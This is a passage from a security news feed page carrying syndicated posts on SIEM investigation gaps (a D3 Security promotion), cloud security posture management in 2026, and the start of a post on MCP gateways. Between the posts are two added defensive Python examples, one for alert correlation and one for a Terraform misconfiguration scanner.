href="https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/">https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/</a> </p>
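The scenario in the article above (an endpoint alert, an RDP alert and a database alert, each too low-confidence to act on alone) worked through as an added example; this is generic host-and-time chaining in Python, not code from D3 Security or Morpheus AI. Host names, accounts, confidence values, the 30-minute window, the escalation threshold and the noisy-OR score are constructed assumptions.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from math import prod


@dataclass(frozen=True)
class Alert:
    ts: datetime
    tool: str          # which product raised it (EDR, SIEM, NDR)
    src_host: str
    dst_host: str      # equals src_host for a host-local alert
    account: str
    signal: str
    confidence: float  # the raising tool's own confidence, 0..1


@dataclass
class AttackPath:
    alerts: list = field(default_factory=list)

    @property
    def hosts(self):
        """Ordered list of hosts the chained alerts pass through."""
        out = [self.alerts[0].src_host]
        for a in self.alerts:
            if a.dst_host != out[-1]:
                out.append(a.dst_host)
        return out

    @property
    def accounts(self):
        return {a.account for a in self.alerts}

    @property
    def score(self):
        # Noisy-OR: chance that at least one alert is a true positive,
        # assuming (a simplification) that the alerts are independent.
        return 1 - prod(1 - a.confidence for a in self.alerts)


def correlate(alerts, window=timedelta(minutes=30)):
    """Chain alerts where one hop's destination is the next hop's source."""
    paths = []
    for alert in sorted(alerts, key=lambda a: a.ts):
        candidates = [
            p for p in paths
            if p.alerts[-1].dst_host == alert.src_host
            and alert.ts - p.alerts[-1].ts <= window
        ]
        if candidates:
            # Prefer a path already using the same account (credential
            # reuse), then the most recently extended one.
            best = max(candidates,
                       key=lambda p: (alert.account in p.accounts,
                                      p.alerts[-1].ts))
            best.alerts.append(alert)
        else:
            paths.append(AttackPath([alert]))
    return paths


def escalate(paths, min_hosts=3, threshold=0.6):
    """Keep only multi-hop paths whose combined score clears the threshold."""
    return [p for p in paths
            if len(p.hosts) >= min_hosts and p.score >= threshold]


# Constructed sample alerts mirroring the article's timeline, plus two
# unrelated routine events acting as noise.
T0 = datetime(2026, 3, 20, 9, 0)
SAMPLE_ALERTS = [
    Alert(T0, "EDR", "FIN-WS-17", "FIN-WS-17", "jdoe",
          "unusual process activity", 0.30),
    Alert(T0 + timedelta(minutes=10), "SIEM", "IT-WS-04", "FS-02",
          "svc_backup", "RDP logon", 0.10),
    Alert(T0 + timedelta(minutes=15), "SIEM", "FIN-WS-17", "FS-02", "jdoe",
          "RDP logon, unusual for user and hour", 0.25),
    Alert(T0 + timedelta(minutes=22), "NDR", "FS-02", "DB-01", "jdoe",
          "bulk read of customer accounts", 0.35),
    Alert(T0 + timedelta(minutes=200), "NDR", "APP-09", "DB-01", "svc_app",
          "large query", 0.15),
]

if __name__ == "__main__":
    for path in escalate(correlate(SAMPLE_ALERTS)):
        print(" -> ".join(path.hosts), f"score={path.score:.3f}")
        for a in path.alerts:
            print(f"  {a.ts:%H:%M} [{a.tool}] {a.account}: {a.signal}")
```

No single alert here exceeds 0.35, so none would clear a 0.6 triage threshold alone; only the chained path does.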

Your SIEM Isn’t Broken. Your Investigation Layer Is Missing.

  • Published date: 2026-03-20 00:00:00

<p><strong>73% of security leaders are evaluating SIEM alternatives. Here’s why they’re asking the wrong question.</strong></p><p>The cybersecurity industry has a new consensus: SIEM is broken. Startups pitch AI SOC platforms as the replacement. Analysts warn of vendor lock-in. Conference keynotes declare the end of an era.</p><p>They’re all wrong about the diagnosis.</p><p>The SIEM isn’t broken. The investigation layer that should sit on top of it was never built. And that gap is what’s actually burning out SOC teams, letting attackers dwell for months, and driving the 73% of security leaders who told Sumo Logic they’re shopping for alternatives.</p><h2 class="wp-block-heading">The real numbers behind the frustration</h2><p>The frustration is justified. SANS found that analysts take an average of 56 minutes before acting on an alert and 70 minutes to fully investigate a single incident. Devo reports that 53% of all alerts are false positives. Up to 40% of alerts go completely uninvestigated. And 61% of SOC teams admit to ignoring alerts that later turned out to be genuine compromise.</p><p>Those numbers aren’t a SIEM failure. They’re an investigation capacity failure. SIEMs detect and alert. They were never designed to investigate. When a SIEM fires an alert, a human analyst must manually query across endpoints, identity systems, cloud platforms, email gateways, and network sensors to figure out what actually happened. That manual process takes an hour. Organizations face thousands of alerts daily. The math doesn’t work.</p><h2 class="wp-block-heading">SIEMs still do things nothing else can</h2><p>Before ripping anything out, it’s worth acknowledging what SIEMs do well. They remain the authoritative system of record for compliance (SOC 2, HIPAA, PCI-DSS, NIS2, DORA). They handle log aggregation and normalization at enterprise scale. Their correlation rule engines represent years of detection engineering investment. 
And in May 2025, CISA and NSA published joint guidance explicitly recommending SIEM and SOAR implementation as foundational security infrastructure.</p><p>The global SIEM market is projected to reach $13.55 billion by 2029 at 13.7% CAGR. SIEMs aren’t dying. They’re not going anywhere.</p><h2 class="wp-block-heading">The AI SOC market has a category problem</h2><p>Most AI SOC startups do one thing: they ingest alert feeds, score them with AI, and suppress false positives. That’s genuine noise reduction. True investigation requires cross-stack correlation.</p><p>When SIEM vendors and industry analysts critique AI SOC companies, this L1 triage bot category is typically what they’re examining. Gartner placed AI SOC agents at the Peak of Inflated Expectations in their 2025 Hype Cycle, warning that claims still outpace sustained improvement.</p><p>The critical buyer question: Does the AI investigate threats and correlate across your entire stack? Or does it help humans filter alerts faster while the same structural investigation gap remains?</p><h2 class="wp-block-heading">What investigation actually requires</h2><p>Real investigation means tracing attack paths across tool boundaries. When an attacker pivots from a compromised endpoint to a cloud identity provider to a SaaS application, the SIEM sees the individual logs. But no one is stitching them together into a coherent attack narrative in real time.</p><p>D3 Security’s <a href="https://d3security.com/morpheus/">Morpheus AI</a> was built for exactly this. On every incoming alert, Morpheus AI queries the SIEM to pull correlated logs and context, then correlates across EDR, identity providers, cloud platforms, email gateways, and network sensors to build a unified attack timeline. 
It performs <a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> along two axes simultaneously: vertical deep inspection into the alert’s origin tool and horizontal correlation across the full security stack.</p><p><object data="https://d3security.com/wp-content/uploads/2026/03/MorpheusAPD-4.svg" type="image/svg+xml" width="100%" height="auto"></object></p><p>The result: L2-analyst-depth investigation on every alert, in under two minutes, 24/7. Full investigation with a contextual response playbook generated at runtime from the evidence.</p><h2 class="wp-block-heading">The SIEM becomes more valuable, not less</h2><p>This is the part most AI SOC vendors miss. Morpheus AI treats the SIEM as a critical data source, the investigation’s foundation. It complements rather than competes with your SIEM. Every SIEM log, every correlation rule, every enrichment feed contributes to a more complete investigation.</p><p>The architecture is complementary: the SIEM detects and aggregates; Morpheus AI investigates and responds. Organizations keep their compliance system of record, their centralized log store, their correlation engine. 
They add the investigation intelligence that the SIEM was never designed to provide.</p><h2 class="wp-block-heading">What to ask your current vendors</h2><p>If you’re part of the 73% evaluating alternatives, these questions will separate real capability from marketing:</p><ol class="wp-block-list"> <li>Can your SIEM investigate the alerts it generates, or does it rely entirely on human analysts?</li> <li>Can any single tool in your stack correlate across endpoints, network, identity, email, and cloud simultaneously?</li> <li>Is your AI SOC platform a purpose-built cybersecurity LLM, or a general-purpose model with a security wrapper?</li> <li>Can the platform generate response playbooks contextually at runtime, or does it require static playbook authoring?</li> <li>What happens when one of your vendor’s APIs changes: silent failure, or autonomous <a href="https://d3security.com/morpheus/self-healing-integrations/">self-healing</a>?</li> <li>What is the measurable time from alert to complete investigation? 
Under 2 minutes, or over 60?</li> </ol><h2 class="wp-block-heading">See Morpheus AI Investigate a Real Alert</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> investigating a real alert from your stack in under 2 minutes.</p><figure class="wp-block-image aligncenter size-full"><a href="https://d3security.com/resources/beyond-siem-beside-siem/"><img fetchpriority="high" decoding="async" width="1920" height="1080" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-Beyond-SIEM-Beside-SIEM.jpg" alt="Preview of the whitepaper: Beyond SIEM, Beside SIEM: How AI Closes the SIEM Investigation Gap" class="wp-image-59219" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM.jpg 1920w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-768x432.jpg 768w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px"></a></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/beyond-siem-beside-siem/"><strong>Beyond SIEM, Beside SIEM: How AI Closes the SIEM Investigation Gap</strong></a></p><p>Why 73% of security leaders are evaluating SIEM alternatives, what the real gap is, and how Morpheus AI complements your SIEM investment.</p><p>The post <a href="https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/">Your SIEM Isn’t Broken. 
Your Investigation Layer Is Missing.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a href="https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/">https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/</a> </p>

Cloud Security Posture Management in 2026

  • Johnbosco Ejiofor
  • Published date: 2026-03-20 00:00:00

<p><span data-contrast="auto">Cloud security posture management (CSPM) <a href="https://securityboulevard.com/2025/02/7-cspm-tools-to-secure-your-cloud-infrastructure/" target="_blank" rel="noopener">is now a critical protection for businesses</a> in multi-cloud security environments. As of 2026, most businesses manage a hybrid and multi-cloud strategy and architecture for their AWS, Azure, Google Cloud Platform (GCP) and private clouds, which makes it unrealistic to attempt to monitor these environments manually. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">CSPM continuously monitors for cloud misconfigurations, non-compliance issues and changes in configurations, which in turn deliver automated policies and rules for the cloud services in use. CSPM can also be viewed as a combination of cloud operations, security engineering and compliance teams all in one, which is capable of helping companies scale despite limited teams. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In this way, CSPM offers the awareness required to manage cloud risks through the detection of accessible storage, accessible ports and unsafe IAM policies.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Market adoption also illustrates this shift, as the CSPM market is estimated to rise from </span><a href="https://www.grandviewresearch.com/industry-analysis/cloud-security-posture-management-market-report#:~:text=The%20services%20segment%20is%20projected,to%20enhance%20cloud%20security%20posture." target="_blank" rel="noopener"><span data-contrast="none">$5.25 billion in 2025 to over $10 billion by 2030</span></a><span data-contrast="auto">, according to analysts. 
The evolution of modern CSPM solutions has meant that, in addition to compliance, identity governance, information protection and automation of remediation have been centralized. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Furthermore, these new tools allow CSPM to integrate with DevOps pipelines through policy as code and IaC scans, as well as threat intelligence and SIEM/SOAR tools, as seen in the case of </span><a href="https://www.group-ib.com/products/cloud-security-posture-management/" target="_blank" rel="noopener"><span data-contrast="none">Group-IB’s</span></a><span data-contrast="auto"> CSPM, which monitors misconfigurations in the CI/CD pipeline to detect vulnerabilities before they reach production. CSPM is no longer just an emerging concept; it is now a mature form of cloud-native security that offers unified discovery, prioritization and remediation while reducing operational overhead.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Evolution of CSPM</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">The first CSPMs, which appeared in the 2010s, were basic auditors for single clouds, raising awareness of glaring issues such as S3 buckets in public clouds or disabled encryption features. Yet as the use of the cloud increased, CSPM also evolved rapidly. In the late 2010s, the second generation of CSPMs emerged, capable of handling multiple clouds (AWS, Azure, GCP) by utilizing an agentless approach with API probes for scalability reasons. 
</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Now, CSPMs are context-aware, with built-in support for threat intelligence, CIEM and scanning of containers and Kubernetes clusters, while KSPM identifies </span><a href="https://www.picussecurity.com/resource/blog/the-ten-most-common-kubernetes-security-misconfigurations-how-to-address-them" target="_blank" rel="noopener"><span data-contrast="none">misconfigurations in clusters</span></a><span data-contrast="auto">, and DSPM helps with data security. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The vice president of </span><a href="http://spin.ai/" target="_blank" rel="noopener"><span data-contrast="none">Spin.AI</span></a><span data-contrast="auto"> describes the new generation of CSPMs as follows: “Modern CSPMs are much more independent and able to fix an increasing number of mistakes on their own.” Each generation of CSPM has been characterized by addressing new cloud security issues, evolving from static approaches to AI-based, real-time management of cloud posture. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Some of the key trends within the industry include greater DevOps penetration as well as AI-based automation. By 2026, the leading CSPMs have broadly integrated into the category of cloud-native application protection platforms (CNAPPs). This is because they offer integrated assessments for vulnerabilities, workloads and postures, ensuring that the application of CSPMs is proactive within the CI/CD life cycle and addresses any potential misconfigurations.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">AI-based technology is increasingly being used to improve the detection of potential policy violators as well as anomalous behavior. 
Modern CSPM systems are capable of addressing situations independently and of escalating potentially critical threats to security teams, which is a very different approach from earlier CSPM scanners.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Core Functions and Use Cases</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">By 2026, CSPM has become fully integrated throughout the cloud life cycle, effectively managing risk in dynamic environments. The primary objective of CSPM is continuous compliance and governance, which entails benchmarking against CIS Benchmarks, PCI DSS, HIPAA and GDPR, among other requirements. The platforms provide automated compliance across AWS, Azure and GCP, culminating in consolidated and audit-ready dashboards. Doing this manually is challenging, which is the main reason that nearly 89% of organizations have adopted CSPM, primarily for compliance, as stated by Flexera.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">CSPM also offers features such as automated asset discovery and the tracking of VMs, containers, databases, serverless workloads and SaaS integrations across accounts and regions. CSPM provides real-time visibility and prevents unmanaged assets by monitoring and sending alerts for changes and drifts.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Once assets are mapped, CSPM moves on to risk assessment and prioritization. 
CSPM accomplishes this by using a combination of configuration checks and threat intelligence.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Current CSPMs have evolved into remediation and guardrail areas, including automated remediations, one-click remediations and integrations using orchestration or ticket systems, with security scores directly linked to remediation through automation rules.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Such capabilities are of utmost importance for regulated environments such as </span><a href="https://www.fedramp.gov/" target="_blank" rel="noopener"><span data-contrast="none">FedRAMP </span></a><span data-contrast="auto">and the U.S. Civilian Government. Today, CSPM is vital for organizations that manage multiple accounts, as it supports audit readiness, reduces risks and enables operational control of the environment.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Integration, Automation and AI</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">CSPM has moved very strongly left, specifically into </span><a href="https://www.splunk.com/en_us/blog/learn/ci-cd-devops-pipeline.html"><span data-contrast="none">DevOps workflows and CI/CD pipelines</span></a><span data-contrast="auto">. CSPM scans code, specifically infrastructure as code, such as Terraform and AWS CloudFormation, before deployments. Through the implementation of security as code and the provision of intrinsic guardrails, configuration errors are identified before they enter the production environment. 
According to Group-IB, CSPM has moved into the monitoring of misconfigurations, specifically within CI/CD pipelines.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Sophisticated CSPMs can also correlate posture findings with external threat intelligence. This helps identify which vulnerabilities have a higher probability of being exploited by an adversary, since it correlates posture findings with attack data. This outside-in perspective helps prioritize vulnerabilities according to their attack relevance.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">AI and analytics are playing an ever-increasing role in these capabilities. Machine learning algorithms operate on configuration and telemetry data to find anomalies and unknown risk patterns, whereas AI-driven virtual assistants, such as</span><a href="https://www.paloaltonetworks.com/blog/cloud-security/ai-powered-security-copilot/"><span data-contrast="none"> Prisma Cloud Copilot</span></a><span data-contrast="auto"> from Palo Alto, speed up the overall investigation process. The literature on CSPM solutions identifies AI as a key enabler for CSPM solution development and notes that it is improving accuracy.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">However, other CSPMs go beyond detection to encompass orchestration and remediation. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Advanced CSPMs now integrate with SOAR technology and ticketing systems, as well as cloud-native technology. 
CSPM now utilizes automation to remediate vulnerabilities, a feature that is essential in modern compliance as it assists in the enforcement of security policies in a multi-cloud infrastructure without human intervention.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">One of the distinguishing factors of CSPM in 2026 is its high level of integration and automation. CSPM solutions in 2026 are not standalone tools, as they were in 2020; they have developed into components of the broader security and DevOps ecosystem.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Mitigating Key Cloud Risks</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">CSPM directly tackles risks specifically related to the cloud:</span><span data-ccp-props="{}"> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Cloud Misconfigurations and Drift: The most prevalent cloud security risks are misconfigurations, which can cause security breaches due to misconfigured IAM policy, networking settings or storage permissions, leading to data leaks or security breaches. CSPM continuously monitors such security risks and alerts users to misconfigurations like public buckets or insecure S3 policy configurations. 
As security experts observe, attackers often exploit these misconfigurations in increasingly sophisticated ways.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Identity and Access Threats: Excessive or insufficient privileges are other prominent identity and access threats. According to</span><a href="https://fedtechmagazine.com/article/2024/10/solving-multicloud-security-puzzle-with-cspm-perfcon" target="_blank" rel="noopener"><span data-contrast="none"> Sai Balabhadrapatruni</span></a><span data-contrast="auto">, a staff engineer at Palo Alto, identity-based attackers often leverage weak authentication processes and credentials obtained through theft. Current-generation CSPMs incorporate </span><a href="https://securityboulevard.com/2023/08/how-ciem-offers-a-clear-path-to-cloud-security/?__hstc=82239177.d58973e620b4621f680e52287e00bfc4.1761264000266.1761264000267.1761264000268.1&amp;__hssc=82239177.1.1761264000269&amp;__hsfp=1412292518" target="_blank" rel="noopener"><span data-contrast="none">IAM analytics and CIEM solutions</span></a><span data-contrast="auto"> that detect overprivileged accounts.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Vulnerable and Unpatched Resources: Many modern CSPMs also scan the cloud environment to identify known vulnerabilities, enabling the inclusion of CVE data in the asset inventory list. 
In this way, outdated and unpatched containers or images do not put the environment at risk. A unified view of misconfiguration and vulnerability alerts is offered in the new breed of CNAPP products.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Data Exposure and Compliance Risks: CSPM identifies exposed data in unencrypted databases, incorrectly configured logging and disabled encryption. Rod Wallace of Amazon identifies common data exposures, such as publicly exposed storage buckets. CSPM’s continuous monitoring approach ensures data governance, validating encryption at rest and secure access controls are in place for all accounts.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="5" data-aria-level="1"><span data-contrast="auto">Cloud-Native Containers and Kubernetes: By 2026, most CSPM solutions include capabilities such as Kubernetes security posture management (KSPM), where containers and configurations such as pods, namespace policies and registry settings are monitored, along with alerts for misconfigured registries, insecure Helm charts and misconfigured pod security policies.</span><span data-ccp-props="{}"> </span></li></ul><h3 aria-level="1"><span data-contrast="auto">Leading CSPM Solutions in 2026</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">What sets apart the top CSPMs of 2026, however, is 
their depth, their intelligence and their unification. As noted earlier, leading CSPMs have now outgrown the provision of simple scanning and have evolved into context-rich platforms integrated into CNAPPs, such as </span><a href="https://orca.security/"><span data-contrast="none">Orca Security</span></a><span data-contrast="auto">. What sets them apart, subsequently, is that they offer a unified and integrated version of CSPM, combined with workload security, identity security and data security. Examples of such vendors are Wiz and Microsoft Defender for Cloud.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Ease of use and automation are important differentiators. Top-tier CSPMs also come with comprehensive rule sets, automated compliance templates and remediation playbooks as part of their offering. This means that a number of issues can indeed be solved automatically or through the use of native cloud controls. On the other hand, generative AI assistants can assist teams with the automation of tasks and the addressing of security talent gaps.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Top platforms also specialize in context-aware risk prioritization. This means that they do not treat all issues equally; instead, they correlate misconfigurations directly to asset criticality, exposure and threat intelligence data. Group-IB, for instance, now incorporates attack surface and threat intelligence data to inform posture-related findings and prioritize remediation efforts according to their relevance to adversaries. Similarly, this type of correlation is also done to support alert prioritization features offered by other platforms like SentinelOne.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In short, seamless coordination between multiple clouds is now a requirement. 
Leading CSPMs now promise a single pane of glass approach to AWS, Azure and GCP clouds, normalizing policy and compliance views to reduce noise and friction. Last but not least, state-of-the-art solutions now integrate with GRC and audit solutions to provide role-based reporting, dashboards for executives and risk-based metrics. CSPM has evolved from a standalone control to a fundamental security and governance building block in enterprise architecture in 2026.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Conclusion</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">What was once seen as a compliance-oriented product, albeit in a very narrow sense, has grown into something entirely different: AI-powered products at the heart of cloud security. </span><span data-ccp-props="{}"> </span></p><p><span data-contrast="auto">CSPM in 2026 is no longer optional in any cloud deployment; it is the first line of defense. By its very nature of offering automation, visibility and prioritization of compliance and risk in ever-changing environments, CSPM solutions provide security teams with their best shot.</span><span data-ccp-props="{}"> </span></p><p><span data-contrast="auto">CSPM, when integrated with external threat visibility solutions, allows users to have full clarity regarding cloud risks from code to production. 
While the cloud space continues to see tremendous innovation, the future of CSPM remains exciting, as does its purpose: To completely eradicate risks and complexities so that the cloud can be utilized for safe innovation.</span><span data-ccp-props="{}"> </span></p>
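<p>An added example (not from the article or from any vendor's product) of the pre-deployment infrastructure-as-code check described under “Integration, Automation and AI”: it reads a Terraform plan in JSON form and flags the three misconfiguration classes the article names, accessible storage, accessible ports and unsafe IAM policies. The rule set, severity labels, function names and the sample plan are assumptions constructed for illustration.</p>

```python
import json

# "terraform show -json" output: resource_changes[].change.after = post-apply attributes.
OPEN_CIDRS = {"0.0.0.0/0", "::/0"}
ADMIN_PORTS = {22: "SSH", 3389: "RDP"}
PAB_FLAGS = ("block_public_acls", "block_public_policy",
             "ignore_public_acls", "restrict_public_buckets")
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}  # assumed labels


def _as_list(value):
    """IAM policy fields may be one value or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def check_public_access_block(after):
    """Accessible storage: an S3 public-access-block flag that is not true."""
    off = [flag for flag in PAB_FLAGS if after.get(flag) is not True]
    if off:
        yield "HIGH", "S3 public access not fully blocked: " + ", ".join(off)


def check_security_group(after):
    """Accessible ports: admin ports reachable from any address."""
    for rule in after.get("ingress") or []:
        cidrs = set(rule.get("cidr_blocks") or []) | set(rule.get("ipv6_cidr_blocks") or [])
        if not cidrs & OPEN_CIDRS:
            continue
        low, high = rule.get("from_port", 0), rule.get("to_port", 65535)
        if str(rule.get("protocol")) == "-1":  # all protocols: port fields do not narrow it
            low, high = 0, 65535
        for port, name in sorted(ADMIN_PORTS.items()):
            if low <= port <= high:
                yield "HIGH", f"{name} port {port} open to the internet"


def check_iam_policy(after):
    """Unsafe IAM: Allow statements with wildcard actions on Resource "*"."""
    raw = after.get("policy")
    if not raw:  # value only known after apply, nothing to evaluate yet
        return
    for stmt in _as_list(json.loads(raw).get("Statement")):
        if stmt.get("Effect") != "Allow" or "*" not in _as_list(stmt.get("Resource")):
            continue
        actions = _as_list(stmt.get("Action"))
        if "*" in actions:
            yield "CRITICAL", "policy allows every action on every resource"
        elif any(a.endswith(":*") for a in actions):
            yield "MEDIUM", "service-wide wildcard action on every resource"


CHECKS = {
    "aws_s3_bucket_public_access_block": check_public_access_block,
    "aws_security_group": check_security_group,
    "aws_iam_policy": check_iam_policy,
}


def scan_plan(plan):
    """Return (severity, address, message) findings, most severe first."""
    findings = []
    for rc in plan.get("resource_changes", []):
        after = rc.get("change", {}).get("after")
        check = CHECKS.get(rc.get("type"))
        if check is None or after is None:  # unsupported type or planned delete
            continue
        findings.extend((sev, rc["address"], msg) for sev, msg in check(after))
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f[0]], f[1]))


def gate(findings, fail_on=("CRITICAL", "HIGH")):
    """CI exit code: 1 blocks the deployment, 0 lets it proceed."""
    return 1 if any(sev in fail_on for sev, _, _ in findings) else 0


def _rc(address, after):  # sample-data helper: the type is the address prefix
    return {"address": address, "type": address.split(".")[0], "change": {"after": after}}


# Constructed sample plan (not from the article), trimmed to the fields read above.
SAMPLE_PLAN = {"resource_changes": [
    _rc("aws_s3_bucket_public_access_block.logs", {
        "block_public_acls": True, "block_public_policy": False,
        "ignore_public_acls": True, "restrict_public_buckets": True}),
    _rc("aws_security_group.web", {"ingress": [
        {"protocol": "tcp", "from_port": 443, "to_port": 443, "cidr_blocks": ["0.0.0.0/0"]},
        {"protocol": "tcp", "from_port": 22, "to_port": 22, "cidr_blocks": ["0.0.0.0/0"]}]}),
    _rc("aws_security_group.legacy", None),  # planned delete: no "after" state
    _rc("aws_iam_policy.ci", {"policy": json.dumps(
        {"Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"}})}),
    _rc("aws_iam_policy.reader", {"policy": json.dumps({"Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"}]})}),
]}

if __name__ == "__main__":
    for finding in scan_plan(SAMPLE_PLAN):
        print(*finding, sep=" | ")
```

<p>In a pipeline, a real plan produced by <code>terraform show -json</code> can be loaded with <code>json.load</code> and passed to <code>scan_plan</code>, with the value of <code>gate</code> used as the job's exit status.</p>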

Why MCP Gateways are a Bad Idea (and What to Do Instead)

  • Lidan Hazout
  • Published date: 2026-03-20 00:00:00

<p><span data-contrast="auto">We all love MCP.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto"><a href="https://securityboulevard.com/2026/03/introducing-the-mcp-security-gateway-the-next-generation-of-agentic-security/" target="_blank" rel="noopener">Model Context Protocol is open, simple, and powerful</a>, making it much easier to plug tools into AI agents in a consistent way. It has quickly become a core building block for many agentic architectures.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We all understand the risks.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">When you give an agent access to powerful tools, you also give them the power to break things, leak data, or generate unexpected costs. So naturally, the industry started thinking: </span><i><span data-contrast="auto">“We need a way to control MCP usage.”</span></i><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">That is where </span><b><span data-contrast="auto">MCP Gateways</span></b><span data-contrast="auto"> come in.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The idea is attractive: Put a gateway in front of all MCP servers, and you can monitor tool calls, approve or deny specific actions, and enforce policies at a central control point. It sounds good at first. 
